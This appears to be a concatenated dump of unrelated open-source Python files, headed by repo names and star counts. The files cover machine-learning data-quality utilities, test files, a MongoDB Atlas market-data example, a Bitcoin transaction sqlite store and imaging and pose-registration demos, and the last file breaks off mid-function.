BASELINE_CLASSIFIER = Pipeline([
('imputer', SimpleImputer()),
('classifier', LogisticRegression())
])
BASELINE_REGRESSION = Pipeline([
('imputer', SimpleImputer()),
('classifier', LinearRegression())
])
NUMERIC_TRANSFORMER = Pipeline([
('imputer', SimpleImputer()),
('scaler', StandardScaler())])
CATEGORICAL_TRANSFORMER = Pipeline([
('imputer', SimpleImputer(strategy='most_frequent')),
('encoder', OneHotEncoder(handle_unknown='ignore'))])
ORDINAL_TRANSFORMER = None # Not implemented
def get_prediction_task(df: DataFrame, label: str):
"Heuristics to infer prediction task (classification/regression)."
return 'classification' if len(set(df[label])) == 2 else 'regression'
@ignore_warnings(category=ConvergenceWarning)
def baseline_predictions(df: DataFrame, label: str, task='classification'):
"Train a baseline model and predict for a test set"
# 0. Infer the prediction task
task = get_prediction_task(df=df, label=label)
# 1. Define the baseline model
model = BASELINE_CLASSIFIER if task == 'classification' else BASELINE_REGRESSION
# 2. Train overall model
x_orig, y_orig = df.drop(label, axis=1), label_binarize(df[label], classes=list(set(df[label])))
x_train, x_test, y_train, y_test = train_test_split(x_orig, y_orig, test_size=0.3, random_state=42)
model.fit(x_train.select_dtypes('number'), y_train)
# 3. Predict
if task == 'regression':
y_pred = model.predict(x_test.select_dtypes('number'))
elif task == 'classification':
y_pred = model.predict_proba(x_test.select_dtypes('number'))[:, 1]
# 4. Return both the predictions and x_test, y_test to analyze the performances
return y_pred, x_test, y_test
@ignore_warnings(category=DataConversionWarning)
def baseline_performance(df: DataFrame, label: str,
task: PredictionTask = PredictionTask.CLASSIFICATION,
adjusted_metric: bool = False):
"""Train a baseline model, predict for a test set and return the performance.
Args:
- df (DataFrame): original dataset
- label (str): name of target feature column
- task (PredictionTask): classification, regression
- adjusted_metric (bool): if True, return metric as percentage of max achievable performance
"""
# 0. Infer the prediction task
task = get_prediction_task(df=df, label=label)
# 1. Define the baseline performance metric
metric = roc_auc_score if task == 'classification' else mean_squared_error
# 2. Get the baseline predictions
y_pred, _, y_test = baseline_predictions(df=df, label=label, task=task)
# 3. Get the performance
if adjusted_metric:
perf = adjusted_performance(y_test, y_pred, task=task, metric=metric)
else:
perf = metric(y_test, y_pred)
return perf
def adjusted_performance(y_true, y_pred, task: PredictionTask, metric: callable):
"""Calculates the adjusted metric as ratio of real to maximum performance.
Returns the percentage to the best achievable performance starting from a baseline.
"""
task = PredictionTask(task)
y_default = mean(y_true) if task == PredictionTask.CLASSIFICATION else mode(y_true).mode[0] # define the value
y_base = tile(y_default, (len(y_true), 1)) # create an array with default value
best_perf = metric(y_true, y_true)
base_perf = metric(y_true, y_base)
real_perf = metric(y_true, y_pred)
return (real_perf - base_perf) / (best_perf - base_perf)
@ignore_warnings(category=DataConversionWarning)
def performance_per_feature_values(df: DataFrame, feature: str, label: str, task='classification'):
"""Performance achieved per each value of a groupby feature."""
# 0. Infer the prediction task
task = get_prediction_task(df=df, label=label)
# 1. Define the baseline performance metric
metric = roc_auc_score if task == 'classification' else mean_squared_error
# 2. Get the baseline predictions
y_pred, x_test, y_test = baseline_predictions(df=df, label=label, task=task)
# 3. Get the performances per feature value
uniques = set(x_test[feature])
results = {}
for value in uniques: # for each category
y_pred_cat = y_pred[x_test[feature] == value]
y_true_cat = y_test[x_test[feature] == value]
try:
results[value] = metric(y_true_cat, y_pred_cat)
except ValueError as exc:
results[value] = f'[ERROR] Failed performance metric with message: {exc}'
return results
def performance_per_missing_value(df: DataFrame, feature: str, label: str, task='classification'):
"""Performance difference between valued and missing values in feature."""
# 0. Infer the prediction task
task = get_prediction_task(df=df, label=label)
# 1. Define the baseline performance metric
metric = roc_auc_score if task == 'classification' else mean_squared_error
# 2. Get the baseline predictions
y_pred, x_test, y_test = baseline_predictions(df=df, label=label, task=task)
# 3. Get the performance per valued vs missing feature
missing_mask = x_test[feature].isna()
results = {}
results['missing'] = metric(y_test[missing_mask], y_pred[missing_mask])
results['valued'] = metric(y_test[~missing_mask], y_pred[~missing_mask])
return results
@ignore_warnings(category=ConvergenceWarning)
def predict_missingness(df: DataFrame, feature: str):
"Train a baseline model to predict the missingness of a feature value."
# 0. Preprocessing
df = df.copy() # avoid altering the original DataFrame
target = f'is_missing_{feature}'
# 1. Define the baseline model
model = BASELINE_CLASSIFIER
# 2. Create the new target
df[target] = df[feature].isna()
# 3. Train overall model
x_orig, y_orig = df.drop([feature, target], axis=1), df[target]
x_train, x_test, y_train, y_test = train_test_split(x_orig, y_orig, test_size=0.3, random_state=42)
model.fit(x_train.select_dtypes('number'), y_train)
# 4. Predict
y_pred = model.predict_proba(x_test.select_dtypes('number'))[:, 1]
# 5. Return the area under the roc curve
return roc_auc_score(y_test, y_pred)
def standard_transform(df, dtypes, skip: Optional[list] = None, robust=False):
"""Applies standard transformation to the dataset (imputation, centering and scaling), returns transformed data
and the fitted transformer.
Numerical data is imputed with mean, centered and scaled by 4 standard deviations.
Categorical data is imputed with mode. Encoding is not performed in this stage to preserve the same columns.
If robust is passed as True, will truncate numerical data before computing statistics.
[1]From 1997 <NAME>; Martinez, <NAME>. -
Improved Heterogeneous Distance Functions https://arxiv.org/pdf/cs/9701101.pdf
"""
skip = [] if skip is None else skip
numerical_features = [key for key, value in dtypes.items() if value == 'numerical' and key not in skip]
categorical_features = [key for key, value in dtypes.items() if value == 'categorical' and key not in skip]
assert len(numerical_features + categorical_features +
skip) == len(df.columns), 'the union of dtypes keys with skip should be the same as the df columns'
if robust:
numeric_transformer = Pipeline([
('imputer', SimpleImputer()),
('scaler', RobustScaler(quantile_range=(5.0, 95.0)))])
else:
numeric_transformer = NUMERIC_TRANSFORMER
preprocessor = ColumnTransformer(
transformers=[ # Numerical vars are scaled by 4sd so that most of the data are fit in the [-1, 1] range
('num', Pipeline(numeric_transformer.steps + \
[('divby4', FunctionTransformer(lambda x: x / 4))]), numerical_features),
('cat', Pipeline([('impute', SimpleImputer(strategy='most_frequent'))]), categorical_features)],
remainder='passthrough')
new_column_order = numerical_features + categorical_features + skip
tdf = DataFrame(preprocessor.fit_transform(df), index=df.index, columns=new_column_order)
return tdf, preprocessor
def performance_one_vs_rest(df: DataFrame, label_feat: str, _class: str, dtypes=None):
"""Train a classifier to predict a class in binary fashion against all other classes.
A normalized dataframe should be passed for best results"""
# 0. Preprocessing
df = df.copy() # avoid altering the original DataFrame
# 1. Define the baseline model
if not dtypes:
dtypes = infer_dtypes(df)
categorical_features = [key for key, value in dtypes.items() if value == 'categorical' and key != label_feat]
preprocessor = ColumnTransformer(
transformers=[('cat', CATEGORICAL_TRANSFORMER, categorical_features)]) # OHE categorical variables
model = Pipeline([('preprocessing', preprocessor), ('classifier', LogisticRegression())])
# 2. Train overall model
x_orig, y_orig = df.drop(label_feat, axis=1), label_binarize(df[label_feat], classes=[_class]).squeeze()
x_train, x_test, y_train, y_test = train_test_split(x_orig, y_orig, test_size=0.3, random_state=24)
model.fit(x_train, y_train)
# 3. Predict
y_pred = model.predict_proba(x_test)[:, 1]
# 4. Return the area under the roc curve
return roc_auc_score(y_test, y_pred)
def center_of_mass_statistic(column: Series, col_dtype: str) -> Union[float, int, str]:
"Returns a center of mass statistic of a column based on its dtype."
return column.mean() if col_dtype == 'numerical' else column.mode()[0] # only first mode
def estimate_centroid(df: DataFrame, dtypes: dict = None):
"""Makes a centroid estimation for a given dataframe.
Will use provided dtypes or infer in order to use best statistic columnwise"""
if dtypes:
if not all((col in dtypes for col in df.columns)):
dtypes = dtypes.update(infer_dtypes(df, skip=dtypes.columns))
else:
dtypes = infer_dtypes(df)
centroid = Series(df.iloc[0])
for col in centroid.index:
centroid[col] = center_of_mass_statistic(df[col], dtypes[col])
return centroid
def heom(x_df: DataFrame, y_df, dtypes):
"""Implements the Heterogeneous Euclidean-Overlap Metric between a sample x and a reference y.
The data is assumed to already be preprocessed (normalized and imputed).
[1]From 1997 <NAME>; <NAME>. -
Improved Heterogeneous Distance Functions https://arxiv.org/pdf/cs/9701101.pdf
"""
distances = DataFrame(empty(x_df.shape), index=x_df.index, columns=x_df.columns)
distance_funcs = {'categorical': lambda x, y: 0 if x == y else 1,
'numerical': lambda x, y: abs(x - y)} # Here we are assuming the data to be previously scaled
for col_idx, column in enumerate(distances.columns):
distances[column] = x_df[column].apply(distance_funcs[dtypes[column]], args=[y_df[col_idx]])
return distances
def estimate_sd(sample: DataFrame, reference=None, dtypes=None):
"""Estimates the standard deviation of a sample of records.
A reference can be passed in order to avoid new computation of mean or to use distances to another reference point.
The reference is expected as a (1, N) array where N is the number of columns in the sample.
Returns:
std_dev: the standard deviation of the distance vectors of the sample to the reference point
std_distances: the distances of the sample points to the reference point scaled by std_dev
"""
if dtypes: # Ensure dtypes are compatible with sample
if not all((col in dtypes for col in sample.columns)):
dtypes = dtypes.update(infer_dtypes(sample, skip=dtypes.columns))
else:
dtypes = infer_dtypes(sample)
if reference is None:
reference = estimate_centroid(sample, dtypes)
else:
assert len(reference) == len(
sample.columns), "The provided reference point does not have the same dimension as the sample records"
distances = heom(x_df=sample, y_df=reference, dtypes=dtypes)
euclidean_distances = (distances.apply(square).sum(axis=1) / len(sample.columns)).apply(sqrt)
std_dev = std(euclidean_distances)
std_distances = euclidean_distances / std_dev
return std_dev, std_distances
def gmm_clustering(data, n_gaussians):
"""Produces a GMM model with n_gaussians to cluster provided data."""
gmm_ = GaussianMixture(n_components=n_gaussians).fit(data)
return gmm_.predict(data), gmm_.aic(data)
def normality_test(data, suite='full', p_th=5e-3):
"""Performs a normality test on the data. Null hypothesis, data comes from normal distribution.
A transformations taken from a suite is applied to the data before each run of the normal test.
The first transformation in the suite that passes the normalcy test is returned
Returns:
result: True if any transformation led to a positive normal test, False otherwise
test: The first test in the suite to lead to positive normal test"""
transforms = {None: lambda x: x,
'inverse': reciprocal,
'square root': sqrt,
'log': nplog,
'Box Cox': boxcox}
if suite == 'full':
suite = transforms.keys()
else:
suite = list(suite) if isinstance(suite, str) else suite
for transform in suite:
try:
transformed_data = transforms[transform](data)
_, p_stat = normaltest(transformed_data, nan_policy='raise')
except (AttributeError, TypeError, ZeroDivisionError, ValueError):
continue
if p_stat > p_th:
return True, transform, p_stat
return False, None, None
|
aggregables/sequences/suffix_trees/suffix_trees/test/test_simple.py | nevesnunes/aggregables | 106 | 12775482 | <filename>aggregables/sequences/suffix_trees/suffix_trees/test/test_simple.py
from suffix_trees import STree
def test_lcs():
a = ["abeceda", "abecednik", "abeabecedabeabeced",
"abecedaaaa", "aaabbbeeecceeeddaaaaabeceda"]
st = STree.STree(a)
assert st.lcs() == "abeced", "LCS test"
def test_missing():
text = "name language w en url http w namelanguage en url http"
stree = STree.STree(text)
assert stree.find("law") == -1
assert stree.find("ptth") == -1
assert stree.find("name language w en url http w namelanguage en url httpp") == -1
def test_find():
st = STree.STree("abcdefghab")
assert st.find("abc") == 0
assert st.find_all("ab") == {0, 8}
|
Tests/image_tests/renderpasses/graphs/ForwardRendering.py | wsqjny/Falcor | 1,615 | 12775491 | from falcor import *
def render_graph_ForwardRendering():
loadRenderPassLibrary("DepthPass.dll")
loadRenderPassLibrary("ForwardLightingPass.dll")
loadRenderPassLibrary("BlitPass.dll")
testForwardRendering = RenderGraph("ForwardRenderer")
DepthPass = createPass("DepthPass", {'depthFormat': ResourceFormat.D32Float})
testForwardRendering.addPass(DepthPass, "DepthPass")
SkyBox = createPass("SkyBox")
testForwardRendering.addPass(SkyBox, "SkyBox")
ForwardLightingPass = createPass("ForwardLightingPass", {'sampleCount': 1, 'enableSuperSampling': False})
testForwardRendering.addPass(ForwardLightingPass, "ForwardLightingPass")
BlitPass = createPass("BlitPass", {'filter': SamplerFilter.Linear})
testForwardRendering.addPass(BlitPass, "BlitPass")
testForwardRendering.addEdge("ForwardLightingPass.color", "BlitPass.src")
testForwardRendering.addEdge("DepthPass.depth", "ForwardLightingPass.depth")
testForwardRendering.addEdge("DepthPass.depth", "SkyBox.depth")
testForwardRendering.addEdge("SkyBox.target", "ForwardLightingPass.color")
testForwardRendering.markOutput("BlitPass.dst")
testForwardRendering.markOutput("ForwardLightingPass.motionVecs")
return testForwardRendering
ForwardRendering = render_graph_ForwardRendering()
try: m.addGraph(ForwardRendering)
except NameError: None
|
tests/lib/collectors/bigquery.py | dfjxs/dftimewolf | 191 | 12775535 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests the BigQuery collector."""
import unittest
import mock
from dftimewolf.lib import state
from dftimewolf.lib.collectors import bigquery
from dftimewolf import config
class BigQueryCollectorTest(unittest.TestCase):
"""Tests for the BigQuery collector."""
def testInitialization(self):
"""Tests that the collector can be initialized."""
test_state = state.DFTimewolfState(config.Config)
bq_collector = bigquery.BigQueryCollector(test_state)
self.assertIsNotNone(bq_collector)
@mock.patch('google.cloud.bigquery.Client')
def testQuery(self, mock_bq):
"""Tests that the collector calls the BQ client."""
mock_bq().query().to_dataframe().to_json.return_value = "{'foo':1}"
test_state = state.DFTimewolfState(config.Config)
bq_collector = bigquery.BigQueryCollector(test_state)
bq_collector.SetUp('test_project', 'test_query', 'test_description')
bq_collector.Process()
mock_bq().query.assert_called_with('test_query')
mock_bq().query().to_dataframe().to_json.assert_called_once()
if __name__ == '__main__':
unittest.main()
|
tests/r/test_engel.py | hajime9652/observations | 199 | 12775552 | <reponame>hajime9652/observations<gh_stars>100-1000
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.engel import engel
def test_engel():
"""Test module engel.py by downloading
engel.csv and testing shape of
extracted data has 235 rows and 2 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = engel(test_path)
try:
assert x_train.shape == (235, 2)
except:
shutil.rmtree(test_path)
raise()
|
dvc/parsing/versions.py | lucasalavapena/dvc | 9,136 | 12775586 | <reponame>lucasalavapena/dvc
import enum
from collections.abc import Mapping
from voluptuous import validators
SCHEMA_KWD = "schema"
META_KWD = "meta"
def lockfile_version_schema(value):
expected = [LOCKFILE_VERSION.V2.value] # pylint: disable=no-member
msg = "invalid schema version {}, expected one of {}".format(
value, expected
)
return validators.Any(*expected, msg=msg)(value)
class VersionEnum(str, enum.Enum):
@classmethod
def all_versions(cls):
return [v.value for v in cls]
class LOCKFILE_VERSION(VersionEnum):
V1 = "1.0"
V2 = "2.0"
@classmethod
def from_dict(cls, data):
# 1) if it's empty or or is not a dict, use the latest one (V2).
# 2) use the `schema` identifier if it exists and is a supported
# version
# 3) if it's not in any of the supported version, use the latest one
# 4) if there's no identifier, it's a V1
if not data or not isinstance(data, Mapping):
return cls(cls.V2)
version = data.get(SCHEMA_KWD)
if version:
return cls(version if version in cls.all_versions() else cls.V2)
return cls(cls.V1)
|
tcapy_examples/gen/mongo_aws_examples.py | Ahrvo-Trading-Systems/tcapy | 189 | 12775616 | <reponame>Ahrvo-Trading-Systems/tcapy
"""This shows how we can connect to an instance of MongoDB Atlas to read/write market tick data
Note, that you will need to get a MongoDB Atlas cloud account, and change the connection string below for it to work
"""
__author__ = 'saeedamen' # <NAME> / <EMAIL>
#
# Copyright 2020 Cuemacro Ltd. - http//www.cuemacro.com / @cuemacro
#
# See the License for the specific language governing permissions and limitations under the License.
#
import datetime
import time
from tcapy.util.loggermanager import LoggerManager
from tcapy.conf.constants import Constants
from tcapy.data.datafactory import MarketRequest
from tcapy.data.databasesource import DatabaseSourceArctic
from tcapy.util.mediator import Mediator
from tcapy.util.customexceptions import *
from test.config import *
logger = LoggerManager().getLogger(__name__)
constants = Constants()
logger.info('Make sure you have created folder ' + constants.csv_folder + ' & ' + constants.temp_data_folder +
' otherwise tests will fail')
Mediator.get_volatile_cache().clear_cache()
########################################################################################################################
# YOU MAY NEED TO CHANGE THESE
start_date = '26 Apr 2017'
finish_date = '05 Jun 2017'
ticker = 'EURUSD'
# Market data parameters for tables/databases
test_harness_arctic_market_data_table = 'market_data_table_test_harness'
test_harness_arctic_market_data_store = 'arctic-testharness'
csv_market_data_store = resource('small_test_market_df.parquet')
csv_reverse_market_data_store = resource('small_test_market_df_reverse.parquet')
# Note, you'll need to get your own connection string!
# You can setup your own MongoDB instance on the cloud using MongoDB Atlas https://www.mongodb.com/cloud/atlas
# It will give you the connection string to use
arctic_connection_string = "mongodb+srv://<username>:<password>@cluster0.blah-blah.mongodb.net/?retryWrites=true&w=majority"
def write_mongo_db_atlas_arctic():
"""Tests we can write market data to Arctic/MongoDB on Atlas (cloud)
"""
market_loader = Mediator.get_tca_market_trade_loader(version=tcapy_version)
### Test we can read data from CSV and dump to Arctic (and when read back it matches CSV)
db_start_date = '01 Jan 2016';
db_finish_date = pd.Timestamp(datetime.datetime.utcnow())
database_source = DatabaseSourceArctic(postfix='testharness', arctic_lib_type='CHUNK_STORE', connection_string=arctic_connection_string)
# Write CSV to Arctic
database_source.convert_csv_to_table(csv_market_data_store, ticker,
test_harness_arctic_market_data_table,
if_exists_table='replace', if_exists_ticker='replace', market_trade_data='market',
remove_duplicates=False)
# Read back data from Arctic and compare with CSV
market_request = MarketRequest(start_date=db_start_date, finish_date=db_finish_date, ticker=ticker,
data_store=database_source, # test_harness_arctic_market_data_store,
market_data_database_table=test_harness_arctic_market_data_table)
market_df_load = market_loader.get_market_data(market_request=market_request)
print(market_df_load)
if __name__ == '__main__':
start = time.time()
write_mongo_db_atlas_arctic()
finish = time.time()
print('Status: calculated ' + str(round(finish - start, 3)) + "s")
|
atlas/foundations_rest_api/src/foundations_rest_api/versioning.py | DeepLearnI/atlas | 296 | 12775651 | from pkg_resources import get_distribution, DistributionNotFound
try:
__version__ = get_distribution('foundations_rest_api').version
except DistributionNotFound:
__version__ = None |
allennlp_models/tagging/predictors/sentence_tagger.py | matt-peters/allennlp-models | 402 | 12775658 | from allennlp.predictors.sentence_tagger import SentenceTaggerPredictor # noqa: F401
# This component lives in the main repo because we need it there for tests.
|
pycoind/blockchain/transaction.py | peerchemist/pycoind | 120 | 12775697 | <gh_stars>100-1000
# The MIT License (MIT)
#
# Copyright (c) 2014 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# Transaction Database
#
# txck - transaction composite key (see below)
# txid_hint - hash integer, provides pruning to likely txid
# txn - the binary blob of the transaction
#
# The database is broken up into files about 1.75GB each (so file systems like
# FAT32 work). The database filename contains two numbers, a number of
# partitions (N) and an index (i) which is in the range [0, N). These files
# will be denoted as file(N, i)
#
# When inserting, we insert into the highest N. Given an id, we insert into
# file(N, get_q(txid) % N). The function get_q hash bytes into an integer
#
# When searching, we must check each partition level, so to search for id, we
# start at the highest N, and check:
# 1. file(N, get_q(txid) % N)
# 2. file(N / 2, get_q(txid) % (N / 2))
# 3. file(N / 4, get_q(txid) % (N / 4))
# and so on, until we reach a k, such that (N / (2 ** k)) < 4.
#
# We can also, over time migrate values into higher levels. This is a future
# todo, if performance becomes an issue.
# Composite Keys
#
# We use composite keys so we can optimize space with the 8-byte rowid we get
# by default in a sqlite database as well as the speed gain as they are the
# keys in the B-Tree. (see: http://www.sqlite.org/lang_createtable.html#rowid)
#
# txck (transaction-composite-key: 43 bits)
# - (block-id:23 bits) (txn-index:20 bits)
#
# With these keys, we can support up to 8 million blocks, each block with up
# to 1 million transactions.
# Hints
#
# A hint (hash integer) the integer value of a byte string to quickly prune
# any obviously non-matching elements. The remaining elements must then be
# compared against confirmed values, since the hash may yield false positives.
import os
import random
import sqlite3
import struct
from . import database
from . import keys
from .. import coins
from .. import protocol
from .. import script
from .. import util
__all__ = ['Database']
def get_q(txid):
'Compute the index q from a txid.'
return struct.unpack('>I', txid[:4])[0]
_KEY_DUP = 'PRIMARY KEY must be unique'
_0 = chr(0) * 32
class Transaction(object):
def __init__(self, database, row, _transaction = None):
keys = [n for (n, t, i) in database.Columns]
self._database = database
self._data = dict(zip(keys, row))
# cache for previous outputs' transactions, since it hits the database
self._po_cache = dict()
self._transaction = _transaction
version = property(lambda s: s.txn.version)
inputs = property(lambda s: s.txn.tx_in)
outputs = property(lambda s: s.txn.tx_out)
lock_time = property(lambda s: s.txn.lock_time)
hash = property(lambda s: s.txn.hash)
index = property(lambda s: keys.get_txck_index(s._txck))
def __getstate__(self):
return (self._po_cache, dict(txn = str(self._data['txn']), txck = self._data['txck']))
def __setstate__(self, state):
self._database = None
(self._po_cache, self._data) = state
self._transaction = None
def cache_previous_outputs(self):
for i in xrange(0, len(self.inputs)):
self.previous_transaction(i)
def previous_transaction(self, index):
"Returns the previous output's transaction for the input at index."
# coinbase transaction
if self.index == 0 and index == 0:
return None
# look up the previous output's transaction and cache it
if index not in self._po_cache:
po_hash = self.inputs[index].previous_output.hash
previous_txn = self._database.get(po_hash)
if previous_txn is None:
raise KeyError('missing transaction: %s' % po_hash)
self._po_cache[index] = previous_txn
# return the cache value
return self._po_cache[index]
def previous_output(self, index):
'Returns the previous output for the input at index.'
previous_txn = self.previous_transaction(index)
if previous_txn is None: return None
po = self.inputs[index].previous_output
return previous_txn.outputs[po.index]
def __str__(self):
return "<Transaction hash=0x%s>" % self.hash.encode('hex')
# transaction composite key and database block id; internal use
_txck = property(lambda s: s._data['txck'])
_blockid = property(lambda s: keys.get_txck_blockid(s._txck))
def _previous_uock(self, index):
previous_txn = self.previous_transaction(index)
if previous_txn is None: return None
po = self.inputs[index].previous_output
return keys.get_uock(previous_txn._txck, po.index)
@property
def txn(self):
'The raw transaction object.'
if self._transaction is None:
(vl, self._transaction) = protocol.Txn.parse(self.txn_binary)
return self._transaction
txn_binary = property(lambda s: str(s._data['txn']))
class Database(database.Database):
MINIMUM_N = 4
TARGET_SIZE = (1 << 30) * 7 // 4 # 1.75GB
Columns = [
('txck', 'integer primary key', False),
('txid_hint', 'integer', True),
('txn', 'blob', False),
]
Name = 'txns'
def __init__(self, data_dir = None, coin = coins.Bitcoin):
database.Database.__init__(self, data_dir, coin)
# maps (n, i % n) tuples to sqlite connection
self._connections = dict()
# the largest N level on disk
self._N = self.load_n()
# loading/creating a connection loads/creates the entire level
n = self._N
while n >= self.MINIMUM_N:
self.get_connection(n, 0, True)
n //= 2
#self._unspent = unspent.Database(self.data_dir, coin)
def load_n(self):
'Determine the highest N for a database directory.'
n = self.MINIMUM_N
while True:
if not os.path.isfile(self.get_filename(self.get_suffix(n * 2, 0))):
break
n *= 2
return n
def get_suffix(self, n, q):
return '-%03d-%03d' % (n, q % n)
def get_connection(self, n, q, allow_create = False):
'''Get a connection for the database file at (n, q % n). First a
connection cache is searched. Then the disk is checked for new
files, in which case every file at level n is loaded.
If allow_create and the database file does not exist, all
partitions at the level n are created.'''
# the location we want
loc = (n, q % n)
if loc not in self._connections:
locs = [(n, i) for i in xrange(0, n)]
# doesn't exist; create the files backward
if not os.path.isfile(self.get_filename(self.get_suffix(n, 0))):
if not allow_create: return None
locs.reverse()
for l in locs:
suffix = self.get_suffix(l[0], l[1])
self._connections[l] = database.Database.get_connection(self, suffix)
return self._connections[loc]
def check_size(self):
'Checks the sizes of the database level, increasing the size as needed.'
# if any (statistically selected) database is full, increase our size
suffix = self.get_suffix(self._N, random.randint(0, self._N - 1))
filename = self.get_filename(suffix)
if os.path.getsize(filename) > self.TARGET_SIZE:
self._N *= 2
self.get_connection(self._N, 0, True)
def add(self, block, transactions):
'Add transactions to the database.'
# expand the database if necessary
self.check_size()
# check the merkle root of the transactions against the block
block._check_merkle_root(util.get_merkle_root(transactions))
# for each transaction...
connections = dict()
block_txns = [ ]
for (txn_index, txn) in enumerate(transactions):
# ...get the database to save to
txid = txn.hash
q = get_q(txid)
connection = self.get_connection(self._N, q)
connections[(self._N, q % self._N)] = connection
# ...insert
cursor = connection.cursor()
txck = keys.get_txck(block._blockid, txn_index)
row = (txck, keys.get_hint(txid), buffer(txn.binary()))
try:
cursor.execute(self.sql_insert, row)
# (duplicates don't matter)
except sqlite3.IntegrityError, e:
if e.message != _KEY_DUP:
raise e
# wrap up the transaction for the returned block
block_txns.append(Transaction(self, row, txn))
# commit the transactions to the databases
for connection in connections.values():
connection.commit()
# update the block with the transactions
block._update_transactions(block_txns)
# return the now updated block
return block
# @TODO optimization: store in each txn db a max_blockid so we can prune
def _get(self, txck):
''
for connection in self._connections.values():
cursor = connection.cursor()
cursor.execute(self.sql_select + ' where txck = ?', (txck, ))
row = cursor.fetchone()
if row:
return Transaction(self, row)
return None
def _get_transactions(self, blockid):
"Find all transactions for a block, ordered by transaction index. Internal use."
# the range that this block's composite keys can have [lo, hi)
lo = keys.get_txck(blockid, 0)
hi = keys.get_txck(blockid + 1, 0)
# find all transactions across all databases within this range
txns = [ ]
for connection in self._connections.values():
cursor = connection.cursor()
cursor.execute(self.sql_select + ' where txck >= ? and txck < ?', (lo, hi))
txns.extend((r[0], r) for r in cursor.fetchall())
# sort by index (actually (blockid, index), but all have same blockid)
txns.sort()
# wrap it up in a helpful wrapper
return [Transaction(self, row) for (txck, row) in txns]
def get(self, txid, default = None):
'Get a transaction by its txid.'
# the hint we index by for faster lookup
txid_hint = keys.get_hint(txid)
# search each level (n, n // 2, n // 4, etc)
n = self._N
q = get_q(txid)
while n >= self.MINIMUM_N:
connection = self.get_connection(n, q)
cursor = connection.cursor()
cursor.execute(self.sql_select + ' where txid_hint = ?', (txid_hint, ))
for row in cursor.fetchall():
(vl, txn) = protocol.Txn.parse(row[2])
if txn.hash == txid:
return Transaction(self, row, txn)
n //= 2
# maybe another process grew us, and we didn't know? Try again.
new_n = self.load_n()
if new_n != self._N:
self._N = new_n
return self._get(txid)
return default
#def __getitem__(self, name):
# 'Get a transaction by its txid.'
#
# txn = self.get(name)
# if txn is not None:
# return txn
# raise KeyError(name)
# Useful? Should it return a blockhain.transaction.Transaction or protocol.Txn?
#def __iter__(self):
# 'Iterate over every transaction. There is no meaningful order.'
#
# for connection in self._connections.values():
# cursor = connection.cursor()
# cursor.execute(self.sql_select)
# while True:
# rows = cursor.fetchmany()
# if not rows: break
# for row in rows:
# #yield Transaction(self, row)
# (vl, txn) = protocol.Txn.parse(row[2])[1]
# yield txn
|
Examples/Python/ImageCreateAndSet.py | nathantspencer/SimpleElastix | 350 | 12775699 | <reponame>nathantspencer/SimpleElastix
#!/usr/bin/env python
#=========================================================================
#
# Copyright NumFOCUS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#=========================================================================
from __future__ import print_function
import SimpleITK as sitk
import os
xImg = sitk.Image( 256, 256, sitk.sitkFloat32 )
yImg = sitk.Image( 256, 256, sitk.sitkFloat32 )
for y in range( 0, xImg.GetSize()[1] ):
for x in range( 0, xImg.GetSize()[0] ):
xImg.SetPixel( x, y, x )
yImg[x, y] = y
sigma = 50
xImg = sitk.Subtract( xImg, xImg.GetSize()[0] / 2 )
yImg = yImg - yImg.GetSize()[1] / 2
gaussianImg = sitk.Exp( -1 * (xImg**2 + yImg**2) / (2.0 * sigma**2) )
if ( not "SITK_NOSHOW" in os.environ ):
sitk.Show( gaussianImg, "Gaussian Blob" )
|
examples/registration/demo.py | mli0603/lietorch | 360 | 12775725 | import sys
sys.path.append('../core')
import argparse
import torch
import cv2
import numpy as np
from viz import sim3_visualization
from lietorch import SO3, SE3, Sim3
from networks.sim3_net import Sim3Net
def normalize_images(images):
images = images[:, :, [2,1,0]]
mean = torch.as_tensor([0.485, 0.456, 0.406], device=images.device)
std = torch.as_tensor([0.229, 0.224, 0.225], device=images.device)
return (images/255.0).sub_(mean[:, None, None]).div_(std[:, None, None])
def load_example(i=0):
""" get demo example """
DEPTH_SCALE = 5.0
if i==0:
image1 = cv2.imread('assets/image1.png')
image2 = cv2.imread('assets/image2.png')
depth1 = np.load('assets/depth1.npy') / DEPTH_SCALE
depth2 = np.load('assets/depth2.npy') / DEPTH_SCALE
elif i==1:
image1 = cv2.imread('assets/image3.png')
image2 = cv2.imread('assets/image4.png')
depth1 = np.load('assets/depth3.npy') / DEPTH_SCALE
depth2 = np.load('assets/depth4.npy') / DEPTH_SCALE
images = np.stack([image1, image2], 0)
images = torch.from_numpy(images).permute(0,3,1,2)
depths = np.stack([depth1, depth2], 0)
depths = torch.from_numpy(depths).float()
intrinsics = np.array([320.0, 320.0, 320.0, 240.0])
intrinsics = np.tile(intrinsics[None], (2,1))
intrinsics = torch.from_numpy(intrinsics).float()
return images[None].cuda(), depths[None].cuda(), intrinsics[None].cuda()
@torch.no_grad()
def demo(model, index=0):
images, depths, intrinsics = load_example(index)
# initial transformation estimate
if args.transformation == 'SE3':
Gs = SE3.Identity(1, 2, device='cuda')
elif args.transformation == 'Sim3':
Gs = Sim3.Identity(1, 2, device='cuda')
